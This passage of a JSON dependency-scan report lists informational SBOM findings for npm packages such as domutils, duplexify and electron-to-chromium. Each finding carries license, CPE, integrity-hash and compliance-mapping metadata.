"spdxExpression": "BSD-2-Clause", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:domhandler:domhandler:5.0.3:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/domhandler@5.0.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/domhandler/-/domhandler-5.0.3.tgz", "integrity": "sha512-cgwlv/1iFQiFnU96XXgROh8xTeetsnJiDsTc7TYCLFd9+/WNkIqPTxiM/8pSd8VIrhXGTf1Ny1q1hquVqDJB5w==", "dependencies": { "domelementtype": "^2.3.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "d6dff11bd10e354b", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: domutils 3.2.2", "title": "domutils 3.2.2", "description": "Package discovered: domutils 3.2.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "1b9db533b6297450", "name": "domutils", "version": "3.2.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "BSD-2-Clause", "spdxExpression": "BSD-2-Clause", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:domutils:domutils:3.2.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/domutils@3.2.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/domutils/-/domutils-3.2.2.tgz", "integrity": "sha512-6kZKyUajlDuqlHKVX1w7gyslj9MPIXzIFiz/rGu35uC1wMi+kMhQwGhl4lt9unC9Vb9INnY9Z3/ZA3+FhASLaw==", "dependencies": { "dom-serializer": "^2.0.0", "domelementtype": "^2.3.0", "domhandler": "^5.0.3" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "4726026d0ba78a1e", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: dunder-proto 1.0.1", "title": "dunder-proto 1.0.1", "description": "Package discovered: dunder-proto 1.0.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "23d9641db70f3051", "name": "dunder-proto", "version": "1.0.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:dunder-proto:dunder-proto:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:dunder-proto:dunder_proto:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:dunder_proto:dunder-proto:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:dunder_proto:dunder_proto:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:dunder:dunder-proto:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:dunder:dunder_proto:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/dunder-proto@1.0.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/dunder-proto/-/dunder-proto-1.0.1.tgz", "integrity": "sha512-KIN/nDJBQRcXw0MLVhZE9iQHmG68qAVIBg9CqmUYjmQIhgij9U5MFvrqkUL5FbtyyzZuOeOt0zdeRe4UY7ct+A==", "dependencies": { "call-bind-apply-helpers": "^1.0.1", "es-errors": "^1.3.0", "gopd": "^1.2.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "eae177c358a69822", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: duplexify 4.1.3", "title": "duplexify 4.1.3", "description": "Package discovered: duplexify 4.1.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "91c59a4a431b283f", "name": "duplexify", "version": "4.1.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:duplexify:duplexify:4.1.3:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/duplexify@4.1.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/duplexify/-/duplexify-4.1.3.tgz", "integrity": "sha512-M3BmBhwJRZsSx38lZyhE53Csddgzl5R7xGJNk7CVddZD6CcmwMCH8J+7AprIrQKH7TonKxaCjcv27Qmf+sQ+oA==", "dependencies": { "end-of-stream": "^1.4.1", "inherits": "^2.0.3", "readable-stream": "^3.1.1", "stream-shift": "^1.0.2" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "d3b8cfaa5ee0e8d1", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: eastasianwidth 0.2.0", "title": "eastasianwidth 0.2.0", "description": "Package discovered: eastasianwidth 0.2.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "e7e9dd6a07994e54", "name": "eastasianwidth", "version": "0.2.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:eastasianwidth:eastasianwidth:0.2.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/eastasianwidth@0.2.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/eastasianwidth/-/eastasianwidth-0.2.0.tgz", "integrity": "sha512-I88TYZWc9XiYHRQ4/3c5rjjfgkjhLyW2luGIheGERbNQ6OY7yTybanSpDXZa8y7VUP9YmDcYa+eyq4ca7iLqWA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "cb63ab5ab6733afe", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: ecdsa-sig-formatter 1.0.11", "title": "ecdsa-sig-formatter 1.0.11", "description": "Package discovered: ecdsa-sig-formatter 1.0.11", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "4ed0ded14e893339", "name": "ecdsa-sig-formatter", "version": "1.0.11", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0", "spdxExpression": "Apache-2.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:ecdsa-sig-formatter:ecdsa-sig-formatter:1.0.11:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:ecdsa-sig-formatter:ecdsa_sig_formatter:1.0.11:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:ecdsa_sig_formatter:ecdsa-sig-formatter:1.0.11:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:ecdsa_sig_formatter:ecdsa_sig_formatter:1.0.11:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:ecdsa-sig:ecdsa-sig-formatter:1.0.11:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:ecdsa-sig:ecdsa_sig_formatter:1.0.11:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:ecdsa_sig:ecdsa-sig-formatter:1.0.11:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:ecdsa_sig:ecdsa_sig_formatter:1.0.11:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:ecdsa:ecdsa-sig-formatter:1.0.11:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:ecdsa:ecdsa_sig_formatter:1.0.11:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/ecdsa-sig-formatter@1.0.11", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/ecdsa-sig-formatter/-/ecdsa-sig-formatter-1.0.11.tgz", "integrity": "sha512-nagl3RYrbNv6kQkeJIpt6NJZy8twLB/2vtz6yN9Z4vRKHN4/QZJIEbqohALSgwKdnksuY3k5Addp5lg8sVoVcQ==", "dependencies": { "safe-buffer": "^5.0.1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "3d3ef9aed82705e2", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: editorconfig 1.0.7", "title": "editorconfig 1.0.7", "description": "Package discovered: editorconfig 1.0.7", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "122ede063714b5b3", "name": "editorconfig", "version": "1.0.7", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:editorconfig:editorconfig:1.0.7:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/editorconfig@1.0.7", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/editorconfig/-/editorconfig-1.0.7.tgz", "integrity": "sha512-e0GOtq/aTQhVdNyDU9e02+wz9oDDM+SIOQxWME2QRjzRX5yyLAuHDE+0aE8vHb9XRC8XD37eO2u57+F09JqFhw==", "dependencies": { "@one-ini/wasm": "0.1.1", "commander": "^10.0.0", "minimatch": "^9.0.1", "semver": "^7.5.3" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "9669afa378e5a35f", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: ee-first 1.1.1", "title": "ee-first 1.1.1", "description": "Package discovered: ee-first 1.1.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "e40c9e2062507e8a", "name": "ee-first", "version": "1.1.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:ee-first:ee-first:1.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:ee-first:ee_first:1.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:ee_first:ee-first:1.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:ee_first:ee_first:1.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:ee:ee-first:1.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:ee:ee_first:1.1.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/ee-first@1.1.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/ee-first/-/ee-first-1.1.1.tgz", "integrity": "sha512-WMwm9LhRUo+WUaRN+vRuETqG89IgZphVSNkdFgeb6sS/E4OrDIN7t48CAewSHXc6C8lefD8KKfr5vY61brQlow==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "04d3ce47ab6baf5d", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: electron-to-chromium 1.5.345", "title": "electron-to-chromium 1.5.345", "description": "Package discovered: electron-to-chromium 1.5.345", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "dc02d9fca5801675", "name": "electron-to-chromium", "version": "1.5.345", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "ISC", "spdxExpression": "ISC", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:electron-to-chromium:electron-to-chromium:1.5.345:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:electron-to-chromium:electron_to_chromium:1.5.345:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:electron_to_chromium:electron-to-chromium:1.5.345:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:electron_to_chromium:electron_to_chromium:1.5.345:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:electron-to:electron-to-chromium:1.5.345:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:electron-to:electron_to_chromium:1.5.345:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:electron_to:electron-to-chromium:1.5.345:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:electron_to:electron_to_chromium:1.5.345:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:electron:electron-to-chromium:1.5.345:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:electron:electron_to_chromium:1.5.345:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/electron-to-chromium@1.5.345", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.5.345.tgz", "integrity": "sha512-F9JXQGiMrz6yVNPI2qOVPvB9HzjH5cGzhs8oJ6A28V5L/YnzN/0KsuiibqF+F1Fd9qxFzD1BUnYSd8JfULxTwg==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "d03ffa53b9f68b04", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: emoji-regex 10.6.0", "title": "emoji-regex 10.6.0", "description": "Package discovered: emoji-regex 10.6.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "20a2cf9e55a512fb", "name": "emoji-regex", "version": "10.6.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", 